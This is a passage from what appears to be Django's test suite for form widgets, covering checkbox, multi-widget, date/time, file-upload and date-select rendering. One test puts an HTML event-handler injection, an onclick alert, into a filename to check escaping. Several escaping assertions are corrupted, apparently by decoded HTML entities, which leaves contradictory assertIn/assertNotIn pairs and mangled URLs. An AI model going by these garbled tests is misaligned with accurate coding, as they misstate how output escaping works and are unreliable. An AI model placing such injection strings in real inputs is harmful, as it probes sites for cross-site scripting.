<li><label><input checked="checked" type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input checked="checked" type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>""")
self.assertHTMLEqual(w.render('beatles', ['J', 'P', 'R'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<ul>
<li><label><input checked="checked" type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input checked="checked" type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input checked="checked" type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>""")
# If the value is None, none of the options are selected:
self.assertHTMLEqual(w.render('beatles', None, choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<ul>
<li><label><input type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>""")
# If the value corresponds to a label (but not to an option value), none of the options are selected:
self.assertHTMLEqual(w.render('beatles', ['John'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<ul>
<li><label><input type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>""")
# If multiple values are given, but some of them are not valid, the valid ones are selected:
self.assertHTMLEqual(w.render('beatles', ['J', 'G', 'foo'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))), """<ul>
<li><label><input checked="checked" type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input checked="checked" type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>""")
# The value is compared to its str():
self.assertHTMLEqual(w.render('nums', [2], choices=[('1', '1'), ('2', '2'), ('3', '3')]), """<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
</ul>""")
self.assertHTMLEqual(w.render('nums', ['2'], choices=[(1, 1), (2, 2), (3, 3)]), """<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
</ul>""")
self.assertHTMLEqual(w.render('nums', [2], choices=[(1, 1), (2, 2), (3, 3)]), """<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
</ul>""")
# The 'choices' argument can be any iterable:
def get_choices():
for i in range(5):
yield (i, i)
self.assertHTMLEqual(w.render('nums', [2], choices=get_choices()), """<ul>
<li><label><input type="checkbox" name="nums" value="0" /> 0</label></li>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
<li><label><input type="checkbox" name="nums" value="4" /> 4</label></li>
</ul>""")
# You can also pass 'choices' to the constructor:
w = CheckboxSelectMultiple(choices=[(1, 1), (2, 2), (3, 3)])
self.assertHTMLEqual(w.render('nums', [2]), """<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
</ul>""")
# If 'choices' is passed to both the constructor and render(), then they'll both be in the output:
self.assertHTMLEqual(w.render('nums', [2], choices=[(4, 4), (5, 5)]), """<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
<li><label><input type="checkbox" name="nums" value="4" /> 4</label></li>
<li><label><input type="checkbox" name="nums" value="5" /> 5</label></li>
</ul>""")
# Choices are escaped correctly
self.assertHTMLEqual(w.render('escape', None, choices=(('bad', 'you & me'), ('good', mark_safe('you > me')))), """<ul>
<li><label><input type="checkbox" name="escape" value="1" /> 1</label></li>
<li><label><input type="checkbox" name="escape" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="escape" value="3" /> 3</label></li>
<li><label><input type="checkbox" name="escape" value="bad" /> you & me</label></li>
<li><label><input type="checkbox" name="escape" value="good" /> you > me</label></li>
</ul>""")
# Unicode choices are correctly rendered as HTML
self.assertHTMLEqual(w.render('nums', ['ŠĐĆŽćžšđ'], choices=[('ŠĐĆŽćžšđ', 'ŠĐabcĆŽćžšđ'), ('ćžšđ', 'abcćžšđ')]), '<ul>\n<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>\n<li><label><input type="checkbox" name="nums" value="2" /> 2</label></li>\n<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>\n<li><label><input checked="checked" type="checkbox" name="nums" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" /> \u0160\u0110abc\u0106\u017d\u0107\u017e\u0161\u0111</label></li>\n<li><label><input type="checkbox" name="nums" value="\u0107\u017e\u0161\u0111" /> abc\u0107\u017e\u0161\u0111</label></li>\n</ul>')
# Each input gets a separate ID
self.assertHTMLEqual(CheckboxSelectMultiple().render('letters', list('ac'), choices=zip(list('abc'), list('ABC')), attrs={'id': 'abc'}), """<ul id="abc">
<li><label for="abc_0"><input checked="checked" type="checkbox" name="letters" value="a" id="abc_0" /> A</label></li>
<li><label for="abc_1"><input type="checkbox" name="letters" value="b" id="abc_1" /> B</label></li>
<li><label for="abc_2"><input checked="checked" type="checkbox" name="letters" value="c" id="abc_2" /> C</label></li>
</ul>""")
# Each input gets a separate ID when the ID is passed to the constructor
self.assertHTMLEqual(CheckboxSelectMultiple(attrs={'id': 'abc'}).render('letters', list('ac'), choices=zip(list('abc'), list('ABC'))), """<ul id="abc">
<li><label for="abc_0"><input checked="checked" type="checkbox" name="letters" value="a" id="abc_0" /> A</label></li>
<li><label for="abc_1"><input type="checkbox" name="letters" value="b" id="abc_1" /> B</label></li>
<li><label for="abc_2"><input checked="checked" type="checkbox" name="letters" value="c" id="abc_2" /> C</label></li>
</ul>""")
w = CheckboxSelectMultiple()
r = w.get_renderer('abc', 'b', choices=[(c, c.upper()) for c in 'abc'])
# You can iterate over the CheckboxFieldRenderer to get individual elements
expected = [
'<label><input type="checkbox" name="abc" value="a" /> A</label>',
'<label><input checked="checked" type="checkbox" name="abc" value="b" /> B</label>',
'<label><input type="checkbox" name="abc" value="c" /> C</label>',
]
for output, expected in zip(r, expected):
self.assertHTMLEqual(force_text(output), expected)
# You can access individual elements
self.assertHTMLEqual(force_text(r[1]),
'<label><input checked="checked" type="checkbox" name="abc" value="b" /> B</label>')
# Out-of-range errors are propagated
with self.assertRaises(IndexError):
r[42]
def test_subwidget(self):
# Each subwidget tag gets a separate ID when the widget has an ID specified
self.assertHTMLEqual("\n".join(c.tag() for c in CheckboxSelectMultiple(attrs={'id': 'abc'}).subwidgets('letters', list('ac'), choices=zip(list('abc'), list('ABC')))), """<input checked="checked" type="checkbox" name="letters" value="a" id="abc_0" />
<input type="checkbox" name="letters" value="b" id="abc_1" />
<input checked="checked" type="checkbox" name="letters" value="c" id="abc_2" />""")
# Each subwidget tag does not get an ID if the widget does not have an ID specified
self.assertHTMLEqual("\n".join(c.tag() for c in CheckboxSelectMultiple().subwidgets('letters', list('ac'), choices=zip(list('abc'), list('ABC')))), """<input checked="checked" type="checkbox" name="letters" value="a" />
<input type="checkbox" name="letters" value="b" />
<input checked="checked" type="checkbox" name="letters" value="c" />""")
# The id_for_label property of the subwidget should return the ID that is used on the subwidget's tag
self.assertHTMLEqual("\n".join('<input type="checkbox" name="letters" value="%s" id="%s" />' % (c.choice_value, c.id_for_label) for c in CheckboxSelectMultiple(attrs={'id': 'abc'}).subwidgets('letters', [], choices=zip(list('abc'), list('ABC')))), """<input type="checkbox" name="letters" value="a" id="abc_0" />
<input type="checkbox" name="letters" value="b" id="abc_1" />
<input type="checkbox" name="letters" value="c" id="abc_2" />""")
def test_multi(self):
class MyMultiWidget(MultiWidget):
def decompress(self, value):
if value:
return value.split('__')
return ['', '']
def format_output(self, rendered_widgets):
return '<br />'.join(rendered_widgets)
w = MyMultiWidget(widgets=(TextInput(attrs={'class': 'big'}), TextInput(attrs={'class': 'small'})))
self.assertHTMLEqual(w.render('name', ['john', 'lennon']), '<input type="text" class="big" value="john" name="name_0" /><br /><input type="text" class="small" value="lennon" name="name_1" />')
self.assertHTMLEqual(w.render('name', 'john__lennon'), '<input type="text" class="big" value="john" name="name_0" /><br /><input type="text" class="small" value="lennon" name="name_1" />')
self.assertHTMLEqual(w.render('name', 'john__lennon', attrs={'id': 'foo'}), '<input id="foo_0" type="text" class="big" value="john" name="name_0" /><br /><input id="foo_1" type="text" class="small" value="lennon" name="name_1" />')
w = MyMultiWidget(widgets=(TextInput(attrs={'class': 'big'}), TextInput(attrs={'class': 'small'})), attrs={'id': 'bar'})
self.assertHTMLEqual(w.render('name', ['john', 'lennon']), '<input id="bar_0" type="text" class="big" value="john" name="name_0" /><br /><input id="bar_1" type="text" class="small" value="lennon" name="name_1" />')
# Test needs_multipart_form=True if any widget needs it
w = MyMultiWidget(widgets=(TextInput(), FileInput()))
self.assertTrue(w.needs_multipart_form)
# Test needs_multipart_form=False if no widget needs it
w = MyMultiWidget(widgets=(TextInput(), TextInput()))
self.assertFalse(w.needs_multipart_form)
def test_splitdatetime(self):
w = SplitDateTimeWidget()
self.assertHTMLEqual(w.render('date', ''), '<input type="text" name="date_0" /><input type="text" name="date_1" />')
self.assertHTMLEqual(w.render('date', None), '<input type="text" name="date_0" /><input type="text" name="date_1" />')
self.assertHTMLEqual(w.render('date', datetime.datetime(2006, 1, 10, 7, 30)), '<input type="text" name="date_0" value="2006-01-10" /><input type="text" name="date_1" value="07:30:00" />')
self.assertHTMLEqual(w.render('date', [datetime.date(2006, 1, 10), datetime.time(7, 30)]), '<input type="text" name="date_0" value="2006-01-10" /><input type="text" name="date_1" value="07:30:00" />')
# You can also pass 'attrs' to the constructor. In this case, the attrs will be
w = SplitDateTimeWidget(attrs={'class': 'pretty'})
self.assertHTMLEqual(w.render('date', datetime.datetime(2006, 1, 10, 7, 30)), '<input type="text" class="pretty" value="2006-01-10" name="date_0" /><input type="text" class="pretty" value="07:30:00" name="date_1" />')
# Use 'date_format' and 'time_format' to change the way a value is displayed.
w = SplitDateTimeWidget(date_format='%d/%m/%Y', time_format='%H:%M')
self.assertHTMLEqual(w.render('date', datetime.datetime(2006, 1, 10, 7, 30)), '<input type="text" name="date_0" value="10/01/2006" /><input type="text" name="date_1" value="07:30" />')
def test_datetimeinput(self):
w = DateTimeInput()
self.assertHTMLEqual(w.render('date', None), '<input type="text" name="date" />')
d = datetime.datetime(2007, 9, 17, 12, 51, 34, 482548)
self.assertEqual(str(d), '2007-09-17 12:51:34.482548')
# The microseconds are trimmed on display, by default.
self.assertHTMLEqual(w.render('date', d), '<input type="text" name="date" value="2007-09-17 12:51:34" />')
self.assertHTMLEqual(w.render('date', datetime.datetime(2007, 9, 17, 12, 51, 34)), '<input type="text" name="date" value="2007-09-17 12:51:34" />')
self.assertHTMLEqual(w.render('date', datetime.datetime(2007, 9, 17, 12, 51)), '<input type="text" name="date" value="2007-09-17 12:51:00" />')
# Use 'format' to change the way a value is displayed.
w = DateTimeInput(format='%d/%m/%Y %H:%M', attrs={'type': 'datetime'})
self.assertHTMLEqual(w.render('date', d), '<input type="datetime" name="date" value="17/09/2007 12:51" />')
def test_dateinput(self):
w = DateInput()
self.assertHTMLEqual(w.render('date', None), '<input type="text" name="date" />')
d = datetime.date(2007, 9, 17)
self.assertEqual(str(d), '2007-09-17')
self.assertHTMLEqual(w.render('date', d), '<input type="text" name="date" value="2007-09-17" />')
self.assertHTMLEqual(w.render('date', datetime.date(2007, 9, 17)), '<input type="text" name="date" value="2007-09-17" />')
# We should be able to initialize from a unicode value.
self.assertHTMLEqual(w.render('date', '2007-09-17'), '<input type="text" name="date" value="2007-09-17" />')
# Use 'format' to change the way a value is displayed.
w = DateInput(format='%d/%m/%Y', attrs={'type': 'date'})
self.assertHTMLEqual(w.render('date', d), '<input type="date" name="date" value="17/09/2007" />')
def test_timeinput(self):
w = TimeInput()
self.assertHTMLEqual(w.render('time', None), '<input type="text" name="time" />')
t = datetime.time(12, 51, 34, 482548)
self.assertEqual(str(t), '12:51:34.482548')
# The microseconds are trimmed on display, by default.
self.assertHTMLEqual(w.render('time', t), '<input type="text" name="time" value="12:51:34" />')
self.assertHTMLEqual(w.render('time', datetime.time(12, 51, 34)), '<input type="text" name="time" value="12:51:34" />')
self.assertHTMLEqual(w.render('time', datetime.time(12, 51)), '<input type="text" name="time" value="12:51:00" />')
# We should be able to initialize from a unicode value.
self.assertHTMLEqual(w.render('time', '13:12:11'), '<input type="text" name="time" value="13:12:11" />')
# Use 'format' to change the way a value is displayed.
w = TimeInput(format='%H:%M', attrs={'type': 'time'})
self.assertHTMLEqual(w.render('time', t), '<input type="time" name="time" value="12:51" />')
def test_splithiddendatetime(self):
from django.forms.widgets import SplitHiddenDateTimeWidget
w = SplitHiddenDateTimeWidget()
self.assertHTMLEqual(w.render('date', ''), '<input type="hidden" name="date_0" /><input type="hidden" name="date_1" />')
d = datetime.datetime(2007, 9, 17, 12, 51, 34, 482548)
self.assertHTMLEqual(str(d), '2007-09-17 12:51:34.482548')
self.assertHTMLEqual(w.render('date', d), '<input type="hidden" name="date_0" value="2007-09-17" /><input type="hidden" name="date_1" value="12:51:34" />')
self.assertHTMLEqual(w.render('date', datetime.datetime(2007, 9, 17, 12, 51, 34)), '<input type="hidden" name="date_0" value="2007-09-17" /><input type="hidden" name="date_1" value="12:51:34" />')
self.assertHTMLEqual(w.render('date', datetime.datetime(2007, 9, 17, 12, 51)), '<input type="hidden" name="date_0" value="2007-09-17" /><input type="hidden" name="date_1" value="12:51:00" />')
def test_multiwidget(self):
# MultiWidgets are widgets composed of other widgets. They are usually
# combined with MultiValueFields - a field that is composed of other fields.
# MulitWidgets can themselves be composed of other MultiWidgets.
# SplitDateTimeWidget is one example of a MultiWidget.
class ComplexMultiWidget(MultiWidget):
def __init__(self, attrs=None):
widgets = (
TextInput(),
SelectMultiple(choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))),
SplitDateTimeWidget(),
)
super(ComplexMultiWidget, self).__init__(widgets, attrs)
def decompress(self, value):
if value:
data = value.split(',')
return [data[0], list(data[1]), datetime.datetime.strptime(data[2], "%Y-%m-%d %H:%M:%S")]
return [None, None, None]
def format_output(self, rendered_widgets):
return '\n'.join(rendered_widgets)
w = ComplexMultiWidget()
self.assertHTMLEqual(
w.render('name', 'some text,JP,2007-04-25 06:24:00'),
"""
<input type="text" name="name_0" value="some text" />
<select multiple="multiple" name="name_1">
<option value="J" selected="selected">John</option>
<option value="P" selected="selected">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
<input type="text" name="name_2_0" value="2007-04-25" />
<input type="text" name="name_2_1" value="06:24:00" />
""",
)
class ComplexField(MultiValueField):
def __init__(self, required=True, widget=None, label=None, initial=None):
fields = (
CharField(),
MultipleChoiceField(choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))),
SplitDateTimeField()
)
super(ComplexField, self).__init__(fields, required, widget, label, initial)
def compress(self, data_list):
if data_list:
return '%s,%s,%s' % (data_list[0], ''.join(data_list[1]), data_list[2])
return None
f = ComplexField(widget=w)
self.assertEqual(
f.clean(['some text', ['J', 'P'], ['2007-04-25', '6:24:00']]),
'some text,JP,2007-04-25 06:24:00',
)
with self.assertRaisesMessage(ValidationError,
"'Select a valid choice. X is not one of the available choices.'"):
f.clean(['some text', ['X'], ['2007-04-25', '6:24:00']])
# If insufficient data is provided, None is substituted
self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, ['some text', ['JP']])
# test with no initial data
self.assertTrue(f.has_changed(None, ['some text', ['J', 'P'], ['2007-04-25', '6:24:00']]))
# test when the data is the same as initial
self.assertFalse(f.has_changed('some text,JP,2007-04-25 06:24:00',
['some text', ['J', 'P'], ['2007-04-25', '6:24:00']]))
# test when the first widget's data has changed
self.assertTrue(f.has_changed('some text,JP,2007-04-25 06:24:00',
['other text', ['J', 'P'], ['2007-04-25', '6:24:00']]))
# test when the last widget's data has changed. this ensures that it is not
# short circuiting while testing the widgets.
self.assertTrue(f.has_changed('some text,JP,2007-04-25 06:24:00',
['some text', ['J', 'P'], ['2009-04-25', '11:44:00']]))
class ComplexFieldForm(Form):
field1 = ComplexField(widget=w)
f = ComplexFieldForm()
self.assertHTMLEqual(
f.as_table(),
"""
<tr><th><label for="id_field1_0">Field1:</label></th>
<td><input type="text" name="field1_0" id="id_field1_0" />
<select multiple="multiple" name="field1_1" id="id_field1_1">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
<input type="text" name="field1_2_0" id="id_field1_2_0" />
<input type="text" name="field1_2_1" id="id_field1_2_1" /></td></tr>
""",
)
f = ComplexFieldForm({
'field1_0': 'some text',
'field1_1': ['J', 'P'],
'field1_2_0': '2007-04-25',
'field1_2_1': '06:24:00',
})
self.assertHTMLEqual(
f.as_table(),
"""
<tr><th><label for="id_field1_0">Field1:</label></th>
<td><input type="text" name="field1_0" value="some text" id="id_field1_0" />
<select multiple="multiple" name="field1_1" id="id_field1_1">
<option value="J" selected="selected">John</option>
<option value="P" selected="selected">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
<input type="text" name="field1_2_0" value="2007-04-25" id="id_field1_2_0" />
<input type="text" name="field1_2_1" value="06:24:00" id="id_field1_2_1" /></td></tr>
""",
)
self.assertEqual(f.cleaned_data['field1'], 'some text,JP,2007-04-25 06:24:00')
def test_sub_widget_html_safe(self):
widget = TextInput()
subwidget = next(widget.subwidgets('username', 'John Doe'))
self.assertTrue(hasattr(subwidget, '__html__'))
self.assertEqual(force_text(subwidget), subwidget.__html__())
def test_choice_input_html_safe(self):
widget = ChoiceInput('choices', 'CHOICE1', {}, ('CHOICE1', 'first choice'), 0)
self.assertTrue(hasattr(ChoiceInput, '__html__'))
self.assertEqual(force_text(widget), widget.__html__())
def test_choice_field_renderer_html_safe(self):
renderer = ChoiceFieldRenderer('choices', 'CHOICE1', {}, [('CHOICE1', 'first_choice')])
renderer.choice_input_class = lambda *args: args
self.assertTrue(hasattr(ChoiceFieldRenderer, '__html__'))
self.assertEqual(force_text(renderer), renderer.__html__())
class NullBooleanSelectLazyForm(Form):
"""Form to test for lazy evaluation. Refs #17190"""
bool = BooleanField(widget=NullBooleanSelect())
@override_settings(USE_L10N=True)
class FormsI18NWidgetsTests(SimpleTestCase):
def setUp(self):
super(FormsI18NWidgetsTests, self).setUp()
translation.activate('de-at')
def tearDown(self):
translation.deactivate()
super(FormsI18NWidgetsTests, self).tearDown()
def test_datetimeinput(self):
w = DateTimeInput()
d = datetime.datetime(2007, 9, 17, 12, 51, 34, 482548)
self.assertHTMLEqual(w.render('date', d), '<input type="text" name="date" value="17.09.2007 12:51:34" />')
def test_dateinput(self):
w = DateInput()
d = datetime.date(2007, 9, 17)
self.assertHTMLEqual(w.render('date', d), '<input type="text" name="date" value="17.09.2007" />')
def test_timeinput(self):
w = TimeInput()
t = datetime.time(12, 51, 34, 482548)
self.assertHTMLEqual(w.render('time', t), '<input type="text" name="time" value="12:51:34" />')
def test_datetime_locale_aware(self):
w = DateTimeInput()
d = datetime.datetime(2007, 9, 17, 12, 51, 34, 482548)
with self.settings(USE_L10N=False):
self.assertHTMLEqual(w.render('date', d), '<input type="text" name="date" value="2007-09-17 12:51:34" />')
with translation.override('es'):
self.assertHTMLEqual(w.render('date', d), '<input type="text" name="date" value="17/09/2007 12:51:34" />')
def test_splithiddendatetime(self):
from django.forms.widgets import SplitHiddenDateTimeWidget
w = SplitHiddenDateTimeWidget()
self.assertHTMLEqual(
w.render('date', datetime.datetime(2007, 9, 17, 12, 51)),
"""
<input type="hidden" name="date_0" value="17.09.2007" />
<input type="hidden" name="date_1" value="12:51:00" />
""",
)
def test_nullbooleanselect(self):
"""
Ensure that the NullBooleanSelect widget's options are lazily
localized.
Refs #17190
"""
f = NullBooleanSelectLazyForm()
self.assertHTMLEqual(
f.fields['bool'].widget.render('id_bool', True),
"""
<select name="id_bool">
<option value="1">Unbekannt</option>
<option value="2" selected="selected">Ja</option>
<option value="3">Nein</option>
</select>
""",
)
class SelectAndTextWidget(MultiWidget):
"""
MultiWidget subclass
"""
def __init__(self, choices=[]):
widgets = [
RadioSelect(choices=choices),
TextInput
]
super(SelectAndTextWidget, self).__init__(widgets)
def _set_choices(self, choices):
"""
When choices are set for this widget, we want to pass those along to the Select widget
"""
self.widgets[0].choices = choices
def _get_choices(self):
"""
The choices for this widget are the Select widget's choices
"""
return self.widgets[0].choices
choices = property(_get_choices, _set_choices)
class WidgetTests(SimpleTestCase):
def test_12048(self):
# See ticket #12048.
w1 = SelectAndTextWidget(choices=[1, 2, 3])
w2 = copy.deepcopy(w1)
w2.choices = [4, 5, 6]
# w2 ought to be independent of w1, since MultiWidget ought
# to make a copy of its sub-widgets when it is copied.
self.assertEqual(w1.choices, [1, 2, 3])
@override_settings(ROOT_URLCONF='forms_tests.urls')
class LiveWidgetTests(AdminSeleniumWebDriverTestCase):
available_apps = ['forms_tests'] + AdminSeleniumWebDriverTestCase.available_apps
def test_textarea_trailing_newlines(self):
"""
Test that a roundtrip on a ModelForm doesn't alter the TextField value
"""
article = Article.objects.create(content="\nTst\n")
self.selenium.get('%s%s' % (self.live_server_url,
reverse('article_form', args=[article.pk])))
self.selenium.find_element_by_id('submit').submit()
article = Article.objects.get(pk=article.pk)
# Should be "\nTst\n" after #19251 is fixed
self.assertEqual(article.content, "\r\nTst\r\n")
@python_2_unicode_compatible
class FakeFieldFile(object):
"""
Quacks like a FieldFile (has a .url and unicode representation), but
doesn't require us to care about storages etc.
"""
url = 'something'
def __str__(self):
return self.url
class ClearableFileInputTests(SimpleTestCase):
def test_clear_input_renders(self):
"""
A ClearableFileInput with is_required False and rendered with
an initial value that is a file renders a clear checkbox.
"""
widget = ClearableFileInput()
widget.is_required = False
self.assertHTMLEqual(
widget.render('myfile', FakeFieldFile()),
"""
Currently: <a href="something">something</a>
<input type="checkbox" name="myfile-clear" id="myfile-clear_id" />
<label for="myfile-clear_id">Clear</label><br />
Change: <input type="file" name="myfile" />
""",
)
def test_html_escaped(self):
"""
A ClearableFileInput should escape name, filename and URL when
rendering HTML. Refs #15182.
"""
@python_2_unicode_compatible
class StrangeFieldFile(object):
url = "something?chapter=1§=2©=3&lang=en"
def __str__(self):
return '''something<div onclick="alert('oops')">.jpg'''
widget = ClearableFileInput()
field = StrangeFieldFile()
output = widget.render('my<div>file', field)
self.assertNotIn(field.url, output)
self.assertIn('href="something?chapter=1&sect=2&copy=3&lang=en"', output)
self.assertNotIn(six.text_type(field), output)
self.assertIn('something<div onclick="alert('oops')">.jpg', output)
self.assertIn('my<div>file', output)
self.assertNotIn('my<div>file', output)
def test_html_does_not_mask_exceptions(self):
"""
A ClearableFileInput should not mask exceptions produced while
checking that it has a value.
"""
@python_2_unicode_compatible
class FailingURLFieldFile(object):
@property
def url(self):
raise RuntimeError('Canary')
def __str__(self):
return 'value'
widget = ClearableFileInput()
field = FailingURLFieldFile()
with self.assertRaisesMessage(RuntimeError, 'Canary'):
widget.render('myfile', field)
def test_clear_input_renders_only_if_not_required(self):
"""
A ClearableFileInput with is_required=False does not render a clear
checkbox.
"""
widget = ClearableFileInput()
widget.is_required = True
self.assertHTMLEqual(
widget.render('myfile', FakeFieldFile()),
"""
Currently: <a href="something">something</a> <br />
Change: <input type="file" name="myfile" />
""",
)
def test_clear_input_renders_only_if_initial(self):
"""
A ClearableFileInput instantiated with no initial value does not render
a clear checkbox.
"""
widget = ClearableFileInput()
widget.is_required = False
self.assertHTMLEqual(widget.render('myfile', None),
'<input type="file" name="myfile" />')
def test_clear_input_checked_returns_false(self):
"""
ClearableFileInput.value_from_datadict returns False if the clear
checkbox is checked, if not required.
"""
widget = ClearableFileInput()
widget.is_required = False
self.assertEqual(widget.value_from_datadict(
data={'myfile-clear': True},
files={},
name='myfile'), False)
def test_clear_input_checked_returns_false_only_if_not_required(self):
"""
ClearableFileInput.value_from_datadict never returns False if the field
is required.
"""
widget = ClearableFileInput()
widget.is_required = True
f = SimpleUploadedFile('something.txt', b'content')
self.assertEqual(widget.value_from_datadict(
data={'myfile-clear': True},
files={'myfile': f},
name='myfile'), f)
def test_render_custom_template(self):
widget = ClearableFileInput()
widget.template_with_initial = (
'%(initial_text)s: <img src="%(initial_url)s" alt="%(initial)s" /> '
'%(clear_template)s<br />%(input_text)s: %(input)s'
)
self.assertHTMLEqual(
widget.render('myfile', FakeFieldFile()),
'Currently: <img src="something" alt="something" /> '
'<input type="checkbox" name="myfile-clear" id="myfile-clear_id" /> '
'<label for="myfile-clear_id">Clear</label><br />Change: <input type="file" name="myfile" />'
)
class GetDate(Form):
mydate = DateField(widget=SelectDateWidget)
class SelectDateWidgetTests(SimpleTestCase):
# The forms library comes with some extra, higher-level Field and Widget
def test_selectdate(self):
self.maxDiff = None
w = SelectDateWidget(years=('2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014', '2015', '2016'))
# Rendering the default state.
self.assertHTMLEqual(
w.render('mydate', ''),
"""
<select name="mydate_month" id="id_mydate_month">
<option value="0">---</option>
<option value="1">January</option>
<option value="2">February</option>
<option value="3">March</option>
<option value="4">April</option>
<option value="5">May</option>
<option value="6">June</option>
<option value="7">July</option>
<option value="8">August</option>
<option value="9">September</option>
<option value="10">October</option>
<option value="11">November</option>
<option value="12">December</option>
</select>
<select name="mydate_day" id="id_mydate_day">
<option value="0">---</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
</select>
<select name="mydate_year" id="id_mydate_year">
<option value="0">---</option>
<option value="2007">2007</option>
<option value="2008">2008</option>
<option value="2009">2009</option>
<option value="2010">2010</option>
<option value="2011">2011</option>
<option value="2012">2012</option>
<option value="2013">2013</option>
<option value="2014">2014</option>
<option value="2015">2015</option>
<option value="2016">2016</option>
</select>
""",
)
# Rendering the None or '' values should yield the same output.
self.assertHTMLEqual(w.render('mydate', None), w.render('mydate', ''))
# Rendering a string value.
self.assertHTMLEqual(
w.render('mydate', '2010-04-15'),
"""
<select name="mydate_month" id="id_mydate_month">
<option value="0">---</option>
<option value="1">January</option>
<option value="2">February</option>
<option value="3">March</option>
<option value="4" selected="selected">April</option>
<option value="5">May</option>
<option value="6">June</option>
<option value="7">July</option>
<option value="8">August</option>
<option value="9">September</option>
<option value="10">October</option>
<option value="11">November</option>
<option value="12">December</option>
</select>
<select name="mydate_day" id="id_mydate_day">
<option value="0">---</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15" selected="selected">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
</select>
<select name="mydate_year" id="id_mydate_year">
<option value="0">---</option>
<option value="2007">2007</option>
<option value="2008">2008</option>
<option value="2009">2009</option>
<option value="2010" selected="selected">2010</option>
<option value="2011">2011</option>
<option value="2012">2012</option>
<option value="2013">2013</option>
<option value="2014">2014</option>
<option value="2015">2015</option>
<option value="2016">2016</option>
</select>
""",
)
# Rendering a datetime value.
self.assertHTMLEqual(w.render('mydate', datetime.date(2010, 4, 15)), w.render('mydate', '2010-04-15'))
# Invalid dates should still render the failed date.
self.assertHTMLEqual(
w.render('mydate', '2010-02-31'),
"""
<select name="mydate_month" id="id_mydate_month">
<option value="0">---</option>
<option value="1">January</option>
<option value="2" selected="selected">February</option>
<option value="3">March</option>
<option value="4">April</option>
<option value="5">May</option>
<option value="6">June</option>
<option value="7">July</option>
